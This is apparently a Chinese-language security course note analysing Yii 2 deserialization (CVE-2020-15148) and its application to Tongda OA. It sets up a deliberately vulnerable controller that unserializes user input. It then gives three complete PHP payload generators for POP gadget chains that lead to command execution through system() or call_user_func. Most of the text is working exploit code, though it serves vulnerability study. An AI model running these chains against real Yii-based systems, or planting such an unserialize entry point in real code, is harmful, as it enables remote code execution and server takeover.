PHP框架开发篇&Yii反序列化&POP利用链&某达OA&某商城&CVE分析
参考资料:CVE-2020-15148漏洞分析
https://www.extrader.top/posts/c79847ee
https://www.anquanke.com/post/id/254429
https://blog.csdn.net/unexpectedthing/article/details/123829375
1、环境部署:
phpstudy php7.4.3 Apache Yii-2.0.37
2、添加入口:
controllers/TestController.php
<?php
namespace app\controllers;
use yii\web\Controller;
class TestController extends Controller{
public function actionTest($data){
return unserialize(base64_decode($data));
}
}
3、反序列化链分析:
#POP链1:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
GuzzleHttp\Psr7::close()->call_user_func
->$_fn_close
<?php
//GuzzleHttp\Psr7::close()->call_user_func
//->$_fn_close
namespace GuzzleHttp\Psr7{
class FnStream{
var $_fn_close = "phpinfo";
}
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use GuzzleHttp\Psr7\FnStream;
class BatchQueryResult{
private $_dataReader;
public function __construct()
{
$this->_dataReader=new FnStream();
}
}
}
namespace{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
#POP链2:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
Faker\Generator::__call()->format()->call_user_func_array()
->$formatters['close']
\yii\rest\IndexAction::run->call_user_func()
->$checkAccess $id
<?php
//\yii\rest\IndexAction::run->call_user_func()
//->$checkAccess $id
namespace yii\rest{
class IndexAction
{
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess = 'system';
$this->id = 'calc';
}
}
}
//Faker\Generator::__call()->format()->call_user_func_array()
//->$formatters['close']
namespace Faker{
use \yii\rest\IndexAction;
class Generator{
protected $formatters = array();
public function __construct()
{
$this->formatters['close'] = [new IndexAction(), 'run'];
}
}
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct()
{
$this->_dataReader=new Generator();
}
}
}
namespace{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
#POP链3:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
Faker\Generator::__call()->format()->call_user_func_array()
->$formatters['close']
\yii\rest\CreateAction::run->call_user_func()
->$checkAccess $id
<?php
//\yii\rest\CreateAction::run->call_user_func()
//->$checkAccess $id
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'system';
$this->id = 'calc'; //命令执行
}
}
}
//Faker\Generator::__call()->format()->call_user_func_array()
//->$formatters['close']
namespace Faker {
use yii\rest\CreateAction;
class Generator
{
protected $formatters;
public function __construct()
{
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct()
{
$this->_dataReader=new Generator();
}
}
}
namespace{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
#实际结合:
1、通达OA-Yii反序列化结合
https://xz.aliyun.com/t/12855
https://forum.butian.net/index.php/share/2415
2、攻防演练审计和0day漏洞挖掘
https://mp.weixin.qq.com/s/L5uklnBuolfqEg-bR4V0rQ
